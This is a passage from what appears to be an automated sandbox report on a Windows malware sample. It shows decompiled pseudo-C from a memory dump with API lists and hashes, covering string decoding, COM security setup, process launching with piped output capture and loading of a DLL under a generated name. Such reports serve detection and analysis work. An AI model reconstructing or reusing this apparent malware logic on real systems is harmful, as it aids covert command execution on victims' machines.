    				void* _t60;
    
    				_t52 = __edx;
    				if(_a8 != 1) {
    					if(_a8 == 0) {
    						_t42 =  *0xe6e684; // 0x510f6c8
    						 *((intOrPtr*)(_t42 + 0xc8))( *0xe6e6a8, 0);
    					}
    					L15:
    					return 1;
    				}
    				E00E585D5();
    				_t20 = E00E597F2( &_v16);
    				_t60 = _t52;
    				if(_t60 < 0 || _t60 <= 0 && _t20 < 0x2e830) {
    					goto L15;
    				} else {
    					E00E58F5E();
    					GetModuleHandleA(0);
    					_t23 = _a4;
    					 *0xe6e69c = _t23;
    					_t24 = GetModuleFileNameW(_t23,  &_v664, 0x104);
    					_t25 = GetLastError();
    					if(_t24 == 0 || _t25 == 0x7a) {
    						L10:
    						return 0;
    					} else {
    						memset( &_v144, 0, 0x80);
    						_t58 = _t57 + 0xc;
    						_t56 = 0;
    						do {
    							_t29 = E00E595AD(_t56);
    							_a8 = _t29;
    							MultiByteToWideChar(0, 0, _t29, 0xffffffff,  &_v144, 0x3f);
    							E00E585A8( &_a8);
    							_t56 = _t56 + 1;
    						} while (_t56 < 0x2710);
    						E00E62A66( *0xe6e69c);
    						 *_t58 = 0x7c3;
    						 *0xe6e684 = E00E5E1C7(0xe6ba20, 0x11c);
    						 *_t58 = 0xb4e;
    						_t34 = E00E595C7(0xe6ba20);
    						_a8 = _t34;
    						_t35 = GetFileAttributesW(_t34);
    						_push( &_a8);
    						if(_t35 == 0xffffffff) {
    							E00E585BB();
    							_v8 = 0;
    							_t39 =  *0xe6e684; // 0x510f6c8
    							_t40 =  *((intOrPtr*)(_t39 + 0x70))(0, 0, E00E55DEE, 0, 0,  &_v8);
    							 *0xe6e6a8 = _t40;
    							if(_t40 != 0) {
    								goto L15;
    							}
    							goto L10;
    						}
    						E00E585BB();
    						goto L10;
    					}
    				}
    			}

    APIs
      • Part of subcall function 00E585D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,00E55F84), ref: 00E585DE
      • Part of subcall function 00E597F2: GetSystemTimeAsFileTime.KERNEL32(?,?,00E55F8C), ref: 00E597FF
    • GetModuleHandleA.KERNEL32(00000000), ref: 00E55FA9
    • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00E55FC4
    • GetLastError.KERNEL32 ref: 00E55FCC
    • memset.MSVCRT ref: 00E55FF0
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00E56012
    • GetFileAttributesW.KERNEL32(00000000), ref: 00E56060
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: File$ModuleTime$AttributesByteCharCreateErrorHandleHeapLastMultiNameSystemWidememset
    • String ID:
    • API String ID: 3148476078-0
    • Opcode ID: 76831b924017d770b1a33454c0cd78b23568a8a49ca3cc9927bf4ae43ea16354
    • Instruction ID: 42178648cf6201ba6e2ecae55b76735685db6dfa04a8f0962a4714a177b1563a
    • Opcode Fuzzy Hash: 76831b924017d770b1a33454c0cd78b23568a8a49ca3cc9927bf4ae43ea16354
    • Instruction Fuzzy Hash: 1631E571900104EFDB20AB21ED49E9E37B8EB44762F109929FC15B72D1EFB4494DCB61
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SysAllocString.OLEAUT32(00000000), ref: 00E5D767
    • SysAllocString.OLEAUT32(?), ref: 00E5D76F
    • SysAllocString.OLEAUT32(00000000), ref: 00E5D783
    • SysFreeString.OLEAUT32(?), ref: 00E5D7FE
    • SysFreeString.OLEAUT32(?), ref: 00E5D801
    • SysFreeString.OLEAUT32(?), ref: 00E5D806
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: String$AllocFree
    • String ID:
    • API String ID: 344208780-0
    • Opcode ID: 6d333ba07e9dad74dd3f932b3856360bea73d908230e122f9c5406b9c3684891
    • Instruction ID: 5dd289ae2817c2973d805c6f1996cf94534227a30cd3a8901e5d9fc4b417e75a
    • Opcode Fuzzy Hash: 6d333ba07e9dad74dd3f932b3856360bea73d908230e122f9c5406b9c3684891
    • Instruction Fuzzy Hash: 7A21F875900218BFDB10DFA9CC88DAFBBBDEF48358B10449AF505A7250DA70AE05CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID:
    • String ID: @$\u%04X$\u%04X\u%04X
    • API String ID: 0-2132903582
    • Opcode ID: 97873b698bf197bff0979668e0b537510b37d5025332c37f4c7359b34de9af13
    • Instruction ID: e3911b6ec483a66547d971c38306463184b8f52fbe459e822f70e73a51f5a6ea
    • Opcode Fuzzy Hash: 97873b698bf197bff0979668e0b537510b37d5025332c37f4c7359b34de9af13
    • Instruction Fuzzy Hash: 394108716C02259BEB2CCDA8BD8AABF7766DFC13E4F182125F942F7242D6618D5083D1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 30%
    			E00E5D52E(void* __ecx) {
    				char _v8;
    				void* _v12;
    				char* _t15;
    				intOrPtr* _t16;
    				void* _t21;
    				intOrPtr* _t23;
    				intOrPtr* _t24;
    				intOrPtr* _t25;
    				void* _t30;
    				void* _t33;
    
    				_v12 = 0;
    				_v8 = 0;
    				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
    				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
    				_t15 =  &_v12;
    				__imp__CoCreateInstance(0xe6b840, 0, 1, 0xe6b850, _t15);
    				if(_t15 < 0) {
    					L5:
    					_t23 = _v8;
    					if(_t23 != 0) {
    						 *((intOrPtr*)( *_t23 + 8))(_t23);
    					}
    					_t24 = _v12;
    					if(_t24 != 0) {
    						 *((intOrPtr*)( *_t24 + 8))(_t24);
    					}
    					_t16 = 0;
    				} else {
    					__imp__#2(__ecx);
    					_t25 = _v12;
    					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
    					if(_t21 < 0) {
    						goto L5;
    					} else {
    						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
    						if(_t21 < 0) {
    							goto L5;
    						} else {
    							_t16 = E00E585EA(8);
    							if(_t16 == 0) {
    								goto L5;
    							} else {
    								 *((intOrPtr*)(_t16 + 4)) = _v12;
    								 *_t16 = _v8;
    							}
    						}
    					}
    				}
    				return _t16;
    			}

    APIs
    • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D541
    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D552
    • CoCreateInstance.OLE32(00E6B840,00000000,00000001,00E6B850,?,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D569
    • SysAllocString.OLEAUT32(00000000), ref: 00E5D574
    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D59F
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
    • String ID:
    • API String ID: 1610782348-0
    • Opcode ID: ca2f94679c2d76f5a3d24b2a82155bac7f8a83d61a222173d4a8c31d292f000b
    • Instruction ID: edcc136155fe842963b3021332e70aae21a4df26a24b7e3cec1fc4096db98c95
    • Opcode Fuzzy Hash: ca2f94679c2d76f5a3d24b2a82155bac7f8a83d61a222173d4a8c31d292f000b
    • Instruction Fuzzy Hash: 08212870701245BFD7289B62DC4DE6BBF7CEFC2B55B00455DB906B72A0DAB09A45CA30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00E6220A(char* __eax, char** _a4, long long* _a8) {
    				char* _v8;
    				long long _v16;
    				char* _t9;
    				signed char _t11;
    				char** _t19;
    				char _t22;
    				long long _t32;
    				long long _t33;
    
    				_t9 = __eax;
    				L00E622D8();
    				_t19 = _a4;
    				_t22 =  *__eax;
    				if( *_t22 != 0x2e) {
    					_t9 = strchr( *_t19, 0x2e);
    					if(_t9 != 0) {
    						 *_t9 =  *_t22;
    					}
    				}
    				L00E6229C();
    				 *_t9 =  *_t9 & 0x00000000;
    				_t11 = strtod( *_t19,  &_v8);
    				asm("fst qword [ebp-0xc]");
    				_t32 =  *0xe68248;
    				asm("fucomp st1");
    				asm("fnstsw ax");
    				if((_t11 & 0x00000044) != 0) {
    					L5:
    					st0 = _t32;
    					L00E6229C();
    					if( *_t11 != 0x22) {
    						_t33 = _v16;
    						goto L8;
    					} else {
    						return _t11 | 0xffffffff;
    					}
    				} else {
    					_t33 =  *0xe68250;
    					asm("fucomp st1");
    					asm("fnstsw ax");
    					if((_t11 & 0x00000044) != 0) {
    						L8:
    						 *_a8 = _t33;
    						return 0;
    					} else {
    						goto L5;
    					}
    				}
    			}

    APIs
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: _errno$localeconvstrchrstrtod
    • String ID:
    • API String ID: 1035490122-0
    • Opcode ID: dd875bcd0328107b4425bb32a3bca7abfb9f24598e299fcd3248220e04b36052
    • Instruction ID: e83fb6d0555c02e21449633aefb0374c1abb0791177c87812fbe8a0d5ac6fbfe
    • Opcode Fuzzy Hash: dd875bcd0328107b4425bb32a3bca7abfb9f24598e299fcd3248220e04b36052
    • Instruction Fuzzy Hash: 32012435940905ABDF126F25F9256993BE4AF4A3E4F2052C8EB80761F2CB718858CBA0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00E5A99D(signed int __ecx) {
    				void* _v8;
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				signed int _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				struct _SECURITY_ATTRIBUTES _v48;
    				intOrPtr _v60;
    				char _v64;
    				intOrPtr _v76;
    				intOrPtr _v80;
    				void* _v84;
    				short _v92;
    				intOrPtr _v96;
    				void _v140;
    				intOrPtr _t77;
    				void* _t79;
    				intOrPtr _t85;
    				intOrPtr _t87;
    				intOrPtr _t89;
    				intOrPtr _t92;
    				intOrPtr _t98;
    				intOrPtr _t100;
    				intOrPtr _t102;
    				long _t111;
    				intOrPtr _t115;
    				intOrPtr _t126;
    				void* _t127;
    				void* _t128;
    				void* _t129;
    				void* _t130;
    
    				_t111 = 0;
    				_v24 = __ecx;
    				_v12 = 0;
    				_v20 = 0;
    				_t127 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				_v48.nLength = 0xc;
    				_v48.lpSecurityDescriptor = 0;
    				_v48.bInheritHandle = 1;
    				_v28 = 0;
    				memset( &_v140, 0, 0x44);
    				asm("stosd");
    				_t130 = _t129 + 0xc;
    				asm("stosd");
    				asm("stosd");
    				asm("stosd");
    				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
    					L18:
    					return 0;
    				}
    				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
    					L13:
    					E00E58600( &_v28, 0);
    					if(_v20 != 0) {
    						_t77 =  *0xe6e684; // 0x510f6c8
    						 *((intOrPtr*)(_t77 + 0x30))(_v20);
    					}
    					if(_v8 != 0) {
    						_t115 =  *0xe6e684; // 0x510f6c8
    						 *((intOrPtr*)(_t115 + 0x30))(_v8);
    					}
    					return _t111;
    				}
    				_t79 = _v16;
    				_v76 = _t79;
    				_v80 = _t79;
    				_v84 = _v12;
    				_v140 = 0x44;
    				_v96 = 0x101;
    				_v92 = 0;
    				_t126 = E00E585EA(0x1001);
    				_v28 = _t126;
    				if(_t126 == 0) {
    					goto L18;
    				}
    				_push( &_v64);
    				_push( &_v140);
    				_t85 =  *0xe6e684; // 0x510f6c8
    				_push(0);
    				_push(0);
    				_push(0x8000000);
    				_push(1);
    				_push(0);
    				_push(0);
    				_push(_v24);
    				_push(0);
    				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
    					goto L13;
    				}
    				_t87 =  *0xe6e684; // 0x510f6c8
    				 *((intOrPtr*)(_t87 + 0x30))(_v12);
    				_t89 =  *0xe6e684; // 0x510f6c8
    				 *((intOrPtr*)(_t89 + 0x30))(_v16);
    				_v24 = _v24 & 0;
    				do {
    					_t92 =  *0xe6e684; // 0x510f6c8
    					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
    					 *((char*)(_v24 + _t126)) = 0;
    					if(_t111 == 0) {
    						_t127 = E00E5918C(_t126, 0);
    					} else {
    						_push(0);
    						_push(_t126);
    						_v32 = _t127;
    						_t127 = E00E59278(_t127);
    						E00E58600( &_v32, 0xffffffff);
    						_t130 = _t130 + 0x14;
    					}
    					_t111 = _t127;
    					_v32 = _t127;
    				} while (_v36 != 0);
    				_push( &_v36);
    				_push(E00E5C384(_t127));
    				_t98 =  *0xe6e68c; // 0x510f890
    				_push(_t127);
    				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
    					L12:
    					_t100 =  *0xe6e684; // 0x510f6c8
    					 *((intOrPtr*)(_t100 + 0x30))(_v64);
    					_t102 =  *0xe6e684; // 0x510f6c8
    					 *((intOrPtr*)(_t102 + 0x30))(_v60);
    					goto L13;
    				}
    				_t128 = E00E5923C(_t127);
    				if(_t128 == 0) {
    					goto L12;
    				}
    				E00E58600( &_v32, 0);
    				return _t128;
    			}

    APIs
    • memset.MSVCRT ref: 00E5A9DA
    • CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 00E5A9FE
    • CreatePipe.KERNEL32(00E5658F,?,0000000C,00000000), ref: 00E5AA15
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
      • Part of subcall function 00E58600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CreateHeapPipe$AllocateFreememset
    • String ID: D
    • API String ID: 2365139273-2746444292
    • Opcode ID: 12cb2d7f546874d3528f201108661d9fef01fbf754f18d5127a8d4f27e38e3f9
    • Instruction ID: 57b00369fc3b9cbf8c83d024a1f5c5ea51e90e5340e726421224a6662408d8a1
    • Opcode Fuzzy Hash: 12cb2d7f546874d3528f201108661d9fef01fbf754f18d5127a8d4f27e38e3f9
    • Instruction Fuzzy Hash: 35515A71D00209AFDB50DFA9DC45ADEB7B9AF08311F144569F500F7291EBB09A098BA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00E5C4D9(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				void _v140;
    				signed char _t14;
    				char _t15;
    				intOrPtr _t20;
    				void* _t25;
    				intOrPtr _t26;
    				intOrPtr _t32;
    				WCHAR* _t34;
    				intOrPtr _t35;
    				struct HINSTANCE__* _t37;
    				int _t38;
    				intOrPtr _t46;
    				void* _t47;
    				intOrPtr _t50;
    				void* _t60;
    				void* _t61;
    				char _t62;
    				char* _t63;
    				void* _t65;
    				intOrPtr _t66;
    				char _t68;
    
    				_t65 = __esi;
    				_t61 = __edi;
    				_t47 = __ebx;
    				_t50 =  *0xe6e688; // 0xe80000
    				_t14 =  *(_t50 + 0x1898);
    				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
    					_t15 = E00E595C7(_t50, 0xb62);
    					_t66 =  *0xe6e688; // 0xe80000
    					_t62 = _t15;
    					_t67 = _t66 + 0xb0;
    					_v8 = _t62;
    					E00E59626( &_v140, 0x40, L"%08x", E00E5D40B(_t66 + 0xb0, E00E5C384(_t66 + 0xb0), 0));
    					_t20 =  *0xe6e688; // 0xe80000
    					asm("sbb eax, eax");
    					_t25 = E00E595C7(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
    					_t63 = "\\";
    					_t26 =  *0xe6e688; // 0xe80000
    					_t68 = E00E592CB(_t26 + 0x1020);
    					_v12 = _t68;
    					E00E585BB( &_v8);
    					_t32 =  *0xe6e688; // 0xe80000
    					_t34 = E00E592CB(_t32 + 0x122a);
    					 *0xe6e784 = _t34;
    					_t35 =  *0xe6e684; // 0x510f6c8
    					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
    					_t37 = LoadLibraryW( *0xe6e784);
    					 *0xe6e77c = _t37;
    					if(_t37 == 0) {
    						_t38 = 0;
    					} else {
    						_push(_t37);
    						_t60 = 0x28;
    						_t38 = E00E5E17C(0xe6bb40, _t60);
    					}
    					 *0xe6e780 = _t38;
    					E00E58600( &_v12, 0xfffffffe);
    					memset( &_v140, 0, 0x80);
    					if( *0xe6e780 != 0) {
    						goto L10;
    					} else {
    						E00E58600(0xe6e784, 0xfffffffe);
    						goto L8;
    					}
    				} else {
    					L8:
    					if( *0xe6e780 == 0) {
    						_t46 =  *0xe6e6bc; // 0x510f7f0
    						 *0xe6e780 = _t46;
    					}
    					L10:
    					return 1;
    				}
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: LibraryLoadmemset
    • String ID: %08x$dll
    • API String ID: 3406617148-2963171978
    • Opcode ID: 6de24a91994d981111173aa0a772771216bbb2c5b1539c2a00c10577211dea61
    • Instruction ID: f0e61a3b8f67d3895d3df82ec6ea21bf09c1b95082cce524563c1d2e2678d047
    • Opcode Fuzzy Hash: 6de24a91994d981111173aa0a772771216bbb2c5b1539c2a00c10577211dea61
    • Instruction Fuzzy Hash: 4931F371500204AFE7009B69FC45E9B33ECEB547A5F105835F904F72D1EAB4A94C8764
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E00E62D80(int _a4, signed int _a8) {
    				int _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				void* __esi;
    				void* _t137;
    				signed int _t141;
    				intOrPtr* _t142;
    				signed int _t145;
    				signed int _t146;
    				intOrPtr _t151;
    				intOrPtr _t161;
    				intOrPtr _t162;
    				intOrPtr _t167;
    				intOrPtr _t170;
    				signed int _t172;
    				intOrPtr _t173;
    				int _t184;
    				intOrPtr _t185;
    				intOrPtr _t188;
    				signed int _t189;
    				void* _t195;
    				int _t202;
    				int _t208;
    				intOrPtr _t217;
    				signed int _t218;
    				int _t219;
    				intOrPtr _t220;
    				signed int _t221;
    				signed int _t222;
    				int _t224;
    				int _t225;
    				signed int _t227;
    				intOrPtr _t228;
    				int _t232;
    				int _t234;
    				signed int _t235;
    				int _t239;
    				void* _t240;
    				int _t245;
    				int _t252;
    				signed int _t253;
    				int _t254;
    				void* _t257;
    				void* _t258;
    				int _t259;
    				intOrPtr _t260;
    				int _t261;
    				signed int _t269;
    				signed int _t271;
    				intOrPtr* _t272;
    				void* _t273;
    
    				_t253 = _a8;
    				_t272 = _a4;
    				_t3 = _t272 + 0xc; // 0x452bf84d
    				_t4 = _t272 + 0x2c; // 0x8df075ff
    				_t228 =  *_t4;
    				_t137 =  *_t3 + 0xfffffffb;
    				_t229 =  <=  ? _t137 : _t228;
    				_v16 =  <=  ? _t137 : _t228;
    				_t269 = 0;
    				_a4 =  *((intOrPtr*)( *_t272 + 4));
    				asm("o16 nop [eax+eax]");
    				while(1) {
    					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
    					_t141 =  *_t8 + 0x2a >> 3;
    					_v12 = 0xffff;
    					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
    					if(_t217 < _t141) {
    						break;
    					}
    					_t11 = _t272 + 0x6c; // 0xa1ec8b55
    					_t12 = _t272 + 0x5c; // 0x5fe85000
    					_t245 =  *_t11 -  *_t12;
    					_v8 = _t245;
    					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
    					_t247 =  <  ? _t195 : _v12;
    					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
    					if(_t227 >= _v16) {
    						L7:
    						if(_t253 != 4) {
    							L10:
    							_t269 = 0;
    							__eflags = 0;
    						} else {
    							_t285 = _t227 - _t195;
    							if(_t227 != _t195) {
    								goto L10;
    							} else {
    								_t269 = _t253 - 3;
    							}
    						}
    						E00E65DA0(_t272, _t272, 0, 0, _t269);
    						_t18 = _t272 + 0x14; // 0xc703f045
    						_t19 = _t272 + 8; // 0x8d000040
    						 *( *_t18 +  *_t19 - 4) = _t227;
    						_t22 = _t272 + 0x14; // 0xc703f045
    						_t23 = _t272 + 8; // 0x8d000040
    						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
    						_t26 = _t272 + 0x14; // 0xc703f045
    						_t27 = _t272 + 8; // 0x8d000040
    						 *( *_t26 +  *_t27 - 2) =  !_t227;
    						_t30 = _t272 + 0x14; // 0xc703f045
    						_t31 = _t272 + 8; // 0x8d000040
    						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
    						E00E64B00(_t285,  *_t272);
    						_t202 = _v8;
    						_t273 = _t273 + 0x14;
    						if(_t202 != 0) {
    							_t208 =  >  ? _t227 : _t202;
    							_v8 = _t208;
    							_t36 = _t272 + 0x38; // 0xf47d8bff
    							_t37 = _t272 + 0x5c; // 0x5fe85000
    							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
    							_t273 = _t273 + 0xc;
    							_t252 = _v8;
    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
    							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
    							_t227 = _t227 - _t252;
    						}
    						if(_t227 != 0) {
    							E00E64C40( *_t272,  *( *_t272 + 0xc), _t227);
    							_t273 = _t273 + 0xc;
    							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
    							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
    							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
    						}
    						_t253 = _a8;
    						if(_t269 == 0) {
    							continue;
    						}
    					} else {
    						if(_t227 != 0 || _t253 == 4) {
    							if(_t253 != 0 && _t227 == _t195) {
    								goto L7;
    							}
    						}
    					}
    					break;
    				}
    				_t142 =  *_t272;
    				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
    				_a4 = _t232;
    				if(_t232 == 0) {
    					_t83 = _t272 + 0x6c; // 0xa1ec8b55
    					_t254 =  *_t83;
    				} else {
    					_t59 = _t272 + 0x2c; // 0x8df075ff
    					_t224 =  *_t59;
    					if(_t232 < _t224) {
    						_t65 = _t272 + 0x3c; // 0x830cc483
    						_t66 = _t272 + 0x6c; // 0xa1ec8b55
    						_t260 =  *_t66;
    						__eflags =  *_t65 - _t260 - _t232;
    						if( *_t65 - _t260 <= _t232) {
    							_t67 = _t272 + 0x38; // 0xf47d8bff
    							_t261 = _t260 - _t224;
    							 *(_t272 + 0x6c) = _t261;
    							memcpy( *_t67,  *_t67 + _t224, _t261);
    							_t70 = _t272 + 0x16b0; // 0xdf750008
    							_t188 =  *_t70;
    							_t273 = _t273 + 0xc;
    							_t232 = _a4;
    							__eflags = _t188 - 2;
    							if(_t188 < 2) {
    								_t189 = _t188 + 1;
    								__eflags = _t189;
    								 *(_t272 + 0x16b0) = _t189;
    							}
    						}
    						_t73 = _t272 + 0x38; // 0xf47d8bff
    						_t74 = _t272 + 0x6c; // 0xa1ec8b55
    						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
    						_t225 = _a4;
    						_t273 = _t273 + 0xc;
    						_t76 = _t272 + 0x6c;
    						 *_t76 =  *(_t272 + 0x6c) + _t225;
    						__eflags =  *_t76;
    						_t78 = _t272 + 0x6c; // 0xa1ec8b55
    						_t184 =  *_t78;
    						_t79 = _t272 + 0x2c; // 0x8df075ff
    						_t239 =  *_t79;
    					} else {
    						 *(_t272 + 0x16b0) = 2;
    						_t61 = _t272 + 0x38; // 0xf47d8bff
    						memcpy( *_t61,  *_t142 - _t224, _t224);
    						_t62 = _t272 + 0x2c; // 0x8df075ff
    						_t184 =  *_t62;
    						_t273 = _t273 + 0xc;
    						_t225 = _a4;
    						_t239 = _t184;
    						 *(_t272 + 0x6c) = _t184;
    					}
    					_t254 = _t184;
    					 *(_t272 + 0x5c) = _t184;
    					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
    					_t185 =  *_t81;
    					_t240 = _t239 - _t185;
    					_t241 =  <=  ? _t225 : _t240;
    					_t242 = ( <=  ? _t225 : _t240) + _t185;
    					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
    				}
    				if( *(_t272 + 0x16c0) < _t254) {
    					 *(_t272 + 0x16c0) = _t254;
    				}
    				if(_t269 == 0) {
    					_t218 = _a8;
    					__eflags = _t218;
    					if(_t218 == 0) {
    						L34:
    						_t89 = _t272 + 0x3c; // 0x830cc483
    						_t219 =  *_t272;
    						_t145 =  *_t89 - _t254 - 1;
    						_a4 =  *_t272;
    						_t234 = _t254;
    						_v16 = _t145;
    						_v8 = _t254;
    						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
    						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
    							_v8 = _t254;
    							_t95 = _t272 + 0x5c; // 0x5fe85000
    							_a4 = _t219;
    							_t234 = _t254;
    							_t97 = _t272 + 0x2c; // 0x8df075ff
    							__eflags =  *_t95 -  *_t97;
    							if( *_t95 >=  *_t97) {
    								_t98 = _t272 + 0x2c; // 0x8df075ff
    								_t167 =  *_t98;
    								_t259 = _t254 - _t167;
    								_t99 = _t272 + 0x38; // 0xf47d8bff
    								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
    								 *(_t272 + 0x6c) = _t259;
    								memcpy( *_t99, _t167 +  *_t99, _t259);
    								_t103 = _t272 + 0x16b0; // 0xdf750008
    								_t170 =  *_t103;
    								_t273 = _t273 + 0xc;
    								__eflags = _t170 - 2;
    								if(_t170 < 2) {
    									_t172 = _t170 + 1;
    									__eflags = _t172;
    									 *(_t272 + 0x16b0) = _t172;
    								}
    								_t106 = _t272 + 0x2c; // 0x8df075ff
    								_t145 = _v16 +  *_t106;
    								__eflags = _t145;
    								_a4 =  *_t272;
    								_t108 = _t272 + 0x6c; // 0xa1ec8b55
    								_t234 =  *_t108;
    								_v8 = _t234;
    							}
    						}
    						_t255 = _a4;
    						_t220 =  *((intOrPtr*)(_a4 + 4));
    						__eflags = _t145 - _t220;
    						_t221 =  <=  ? _t145 : _t220;
    						_t146 = _t221;
    						_a4 = _t221;
    						_t222 = _a8;
    						__eflags = _t146;
    						if(_t146 != 0) {
    							_t114 = _t272 + 0x38; // 0xf47d8bff
    							E00E64C40(_t255,  *_t114 + _v8, _t146);
    							_t273 = _t273 + 0xc;
    							_t117 = _t272 + 0x6c;
    							 *_t117 =  *(_t272 + 0x6c) + _a4;
    							__eflags =  *_t117;
    							_t119 = _t272 + 0x6c; // 0xa1ec8b55
    							_t234 =  *_t119;
    						}
    						__eflags =  *(_t272 + 0x16c0) - _t234;
    						if( *(_t272 + 0x16c0) < _t234) {
    							 *(_t272 + 0x16c0) = _t234;
    						}
    						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
    						_t123 = _t272 + 0xc; // 0x452bf84d
    						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
    						__eflags = _t257 - 0xffff;
    						_t258 =  >  ? 0xffff : _t257;
    						_t124 = _t272 + 0x2c; // 0x8df075ff
    						_t151 =  *_t124;
    						_t125 = _t272 + 0x5c; // 0x5fe85000
    						_t235 = _t234 -  *_t125;
    						__eflags = _t258 - _t151;
    						_t152 =  <=  ? _t258 : _t151;
    						__eflags = _t235 - ( <=  ? _t258 : _t151);
    						if(_t235 >= ( <=  ? _t258 : _t151)) {
    							L49:
    							__eflags = _t235 - _t258;
    							_t154 =  >  ? _t258 : _t235;
    							_a4 =  >  ? _t258 : _t235;
    							__eflags = _t222 - 4;
    							if(_t222 != 4) {
    								L53:
    								_t269 = 0;
    								__eflags = 0;
    							} else {
    								_t161 =  *_t272;
    								__eflags =  *(_t161 + 4);
    								_t154 = _a4;
    								if( *(_t161 + 4) != 0) {
    									goto L53;
    								} else {
    									__eflags = _t154 - _t235;
    									if(_t154 != _t235) {
    										goto L53;
    									} else {
    										_t269 = _t222 - 3;
    									}
    								}
    							}
    							_t131 = _t272 + 0x38; // 0xf47d8bff
    							_t132 = _t272 + 0x5c; // 0x5fe85000
    							E00E65DA0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
    							_t134 = _t272 + 0x5c;
    							 *_t134 =  *(_t272 + 0x5c) + _a4;
